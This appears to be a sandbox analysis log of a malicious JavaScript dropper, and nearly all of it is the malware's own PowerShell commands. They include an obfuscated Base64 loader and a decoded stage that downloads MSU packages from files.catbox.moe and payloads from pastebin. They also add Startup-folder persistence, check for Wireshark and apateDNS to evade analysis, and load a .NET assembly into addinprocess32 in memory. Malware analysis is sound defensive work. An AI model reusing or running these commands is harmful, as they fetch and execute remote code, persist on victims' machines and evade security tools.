[char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAYg' + [char]66 + 'hAHMAZQA7AEYAdQ' + [char]66 + 'uAGMAdA' + [char]66 + 'pAG8AbgAgAEIAYQ' + [char]66 + 'zAGUATQ' + [char]66 + '5AHsAOwAkAEUAQQ' + [char]66 + 'UAFYAaAAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4AC4ARw' + [char]66 + 'lAHQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAKA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAJA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZw' + [char]66 + 'iAGEAcw' + [char]66 + 'lACkAKQA7AHIAZQ' + [char]66 + '0AHUAcg' + [char]66 + 'uACAAJA' + [char]66 + 'FAEEAVA' + [char]66 + 'WAGgAOw' + [char]66 + '9ADsAJA' + [char]66 + 'iAGoAcA' + [char]66 + 'tAGwAIAA9ACAAKAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'wAGEAcw' + [char]66 + '0AGUAYg' + [char]66 + 'pAG4ALg' + [char]66 + 'jAG8AbQAvAHIAYQ' + [char]66 + '3AC8AYg' + [char]66 + 'ZAHIAUg' + [char]66 + 'QAHMANQ' + [char]66 + 'NACcAIAApADsAJA' + [char]66 + 'jAFoATg' + [char]66 + 'xAGYAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAcA' + [char]66 + 'QAEMAbA' + [char]66 + 'XACAAPQAgACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAKAAgACQAYg' + [char]66 + 'qAHAAbQ' + [char]66 + 'sACAAKQAgADsAJA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZw' + [char]66 + 'iAGEAcw' + [char]66 + 'lACAAPQAgACQAcA' + [char]66 + 'QAEMAbA' + [char]66 + 'XADsAIAAkAHAAUA' + [char]66 + 'DAGwAVwAgAD0AIA' + [char]66 + 'CAGEAcw' + [char]66 + 'lAE0AeQA7ACQAcA' + [char]66 + 'QAEMAbA' + [char]66 + 'XACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'jAFoATg' + [char]66 + 'xAGYAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgACcAVQ' + [char]66 + 'UAEYAOAAnACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQATw' + [char]66 + 'DAEoATA' + [char]66 + 'TACAAPQAgACgAIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAyAC4AdA' + [char]66 + '4AHQAJwApACAAOwAkAGwAbQ' + [char]66 + 'JAE8AYQAgAD0AIA' + [char]66 + 'OAGUAdwAtAE8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0ACAAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAOwAkAGwAbQ' + [char]66 + 'JAE8AYQAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAEkAeg' + [char]66 + 'qAHYAZAAgACAAPQAgACgAIA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAkAGMAWg' + [char]66 + 'OAHEAZgAgACkAIAA7ACQASQ' + [char]66 + '' + [char]66 + 'AHkAWQ' + [char]66 + 'wACAAPQAgACQAbA' + [char]66 + 'tAEkATw' + [char]66 + 'hAC4ARA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kAEQAYQ' + [char]66 + '0AGEAKAAgACQASQ' + [char]66 + '6AGoAdg' + [char]66 + 'kACAAKQAgADsAJA' + [char]66 + 'WAGcAdg' + [char]66 + 'LAGEAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAuAEcAZQ' + [char]66 + '0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAJA' + [char]66 + 'JAEEAeQ' + [char]66 + 'ZAHAAKQA7ACQAVg' + [char]66 + 'nAHYASw' + [char]66 + 'hACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'PAEMASg' + [char]66 + 'MAFMAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAJA' + [char]66 + 'PAE0ARw' + [char]66 + '4AEUAIAA9ACAAJwAkAHQAZg' + [char]66 + 'ZAEkAbwAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnACcAZA' + [char]66 + 'sAGwAMAAyAC4AdA' + [char]66 + '4AHQAJwAnACkAIAA7ACQAcg' + [char]66 + '5AGEAZQ' + [char]66 + 'HACAAPQAgACgARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + '0AGYAWQ' + [char]66 + 'JAG8AIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQATw' + [char]66 + 'NAEcAeA' + [char]66 + 'FACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEUAQQ' + [char]66 + 'UAFYAaAAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAE8ATQ' + [char]66 + 'HAHgARQAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgAnACAAKwAgACcAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'FAEEAVA' + [char]66 + 'WAGgAIAApAC4AJwAgADsAJA' + [char]66 + 'PAE0ARw' + [char]66 + '4AEUAIAArAD0AIAAnAEcAZQ' + [char]66 + '0AFQAeQ' + [char]66 + 'wAGUAKAAgACcAJw' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMATA' + [char]66 + 'pAGIAcg' + [char]66 + 'hAHIAeQAzAC4AQw' + [char]66 + 'sAGEAcw' + [char]66 + 'zADEAJwAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AJwAgADsAJA' + [char]66 + 'PAE0ARw' + [char]66 + '4AEUAIAArAD0AIAAnAGUAdA' + [char]66 + 'oAG8AZAAoACAAJwAnAHAAcg' + [char]66 + 'GAFYASQAnACcAIAApAC4ASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUAKAAgACQAbg' + [char]66 + '1AGwAbAAgACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAJw' + [char]66 + 'lAEoATA' + [char]66 + 'ZAHgAZg' + [char]66 + 'GAHEALw' + [char]66 + '3AGEAcgAvAG0Abw' + [char]66 + 'jAC4Abg' + [char]66 + 'pAGIAZQ' + [char]66 + '0AHMAYQ' + [char]66 + 'wAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACcAIAAsACAAJwAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAnACAALAAgACAAJwAnAEQAIA' + [char]66 + 'EAEQAYwA6AFwAdw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAG0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AC4Abg' + [char]66 + 'lAHQAXA' + [char]66 + 'mAHIAYQ' + [char]66 + 'tAGUAdw' + [char]66 + 'vAHIAaw' + [char]66 + 'cAHYANAAuADAALgAzADAAMwAxADkAXA' + [char]66 + 'hAGQAZA' + [char]66 + 'pAG4AcA' + [char]66 + 'yAG8AYw' + [char]66 + 'lAHMAcwAzADIAJwAnACAAKQAgACkAOwAnADsAJA' + [char]66 + 'wAEwAbA' + [char]66 + 'VAE8AIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAzAC4AcA' + [char]66 + 'zADEAJwApACAAOwAkAE8ATQ' + [char]66 + 'HAHgARQAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAcA' + [char]66 + 'MAGwAVQ' + [char]66 + 'PACAAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAgAC0ARQ' + [char]66 + '4AGUAYw' + [char]66 + '1AHQAaQ' + [char]66 + 'vAG4AUA' + [char]66 + 'vAGwAaQ' + [char]66 + 'jAHkAIA' + [char]66 + 'CAHkAcA' + [char]66 + 'hAHMAcwAgAC0ARg' + [char]66 + 'pAGwAZQAgACQAcA' + [char]66 + 'MAGwAVQ' + [char]66 + 'PACAAOw' + [char]66 + '9ADsA';$SUopR = $SUopR.replace('革','B') ;$SUopR = [System.Convert]::FromBase64String( $SUopR ) ;;;$SUopR = [System.Text.Encoding]::Unicode.GetString( $SUopR ) ;$SUopR = $SUopR.replace('%DCPJU%','C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js') ;powershell $SUopR
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qNSnG = $host.Version.Major.Equals(2);If ( $qNSnG ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$fcyzy = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$KhLaK = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $KhLaK ) {$fcyzy = $menos ;}else {$fcyzy = ($fcyzy) ;};$tzxdf = ( New-Object Net.WebClient ) ;$tzxdf.Encoding = [System.Text.Encoding]::UTF8 ;$tzxdf.DownloadFile($fcyzy, ($fbKNY + '\Upwin.msu') ) ;$rHWrT = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js' -Destination ( $rHWrT + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$bjpml = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$pPClW = $webClient.DownloadString( $bjpml ) ;$Stringbase = $pPClW; $pPClW = BaseMy;$pPClW | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$OCJLS = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$lmIOa = New-Object System.Net.WebClient ;$lmIOa.Encoding = [System.Text.Encoding]::UTF8 ;$Izjvd = ( Get-Content -Path $cZNqf ) ;$IAyYp = $lmIOa.DownloadData( $Izjvd ) ;$VgvKa = [System.Text.Encoding]::UTF8.GetString($IAyYp);$VgvKa | Out-File -FilePath $OCJLS -force ;$OMGxE = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$OMGxE += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$OMGxE += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$OMGxE += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$OMGxE += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''eJLYxfFq/war/moc.nibetsap//:sptth'' , ''C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$pLlUO = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$OMGxE | Out-File -FilePath $pLlUO -force ;powershell -ExecutionPolicy Bypass -File $pLlUO ;};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1736

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js"
1⤵
- Checks computer location settings
PID:3444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $SUopR = 'JA' + [char]66 + 'xAE4AUw' + [char]66 + 'uAEcAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAcQ' + [char]66 + 'OAFMAbg' + [char]66 + 'HACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAZg' + [char]66 + 'jAHkAeg' + [char]66 + '5ACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'LAGgATA' + [char]66 + 'hAEsAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'LAGgATA' + [char]66 + 'hAEsAIAApACAAewAkAGYAYw' + [char]66 + '5AHoAeQAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGYAYw' + [char]66 + '5AHoAeQAgAD0AIAAoACQAZg' + [char]66 + 'jAHkAeg' + [char]66 + '5ACkAIAA7AH0AOwAkAHQAeg' + [char]66 + '4AGQAZgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHQAeg' + [char]66 + '4AGQAZgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHQAeg' + [char]66 + '4AGQAZgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'mAGMAeQ' + [char]66 + '6AHkALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAcg' + [char]66 + 'IAFcAcg' + [char]66 + 'UACAAPQAgACgAIAAnAEMAOg' + [char]66 + 'cAFUAcw' + [char]66 + 'lAHIAcw' + [char]66 + 'cACcAIAArACAAWw' + [char]66 + 'FAG4Adg' + [char]66 + 'pAHIAbw' + [char]66 + 'uAG0AZQ' + [char]66 + 'uAHQAXQA6ADoAVQ' + [char]66 + 'zAGUAcg' + [char]66 + 'OAGEAbQ' + [char]66 + 'lACAAKQA7ACQAYg' + [char]66 + 'KAFQAWA' + [char]66 + 'qACAAPQAgACgAIAAkAGYAYg' + [char]66 + 'LAE4AWQAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwAgACkAIAA7ACAAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAuAGUAeA' + [char]66 + 'lACAAdw' + [char]66 + '1AHMAYQAuAGUAeA' + [char]66 + 'lACAAJA' + [char]66 + 'iAEoAVA' + [char]66 + 'YAGoAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAcg' + [char]66 + 'IAFcAcg' + [char]66 + 'UACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 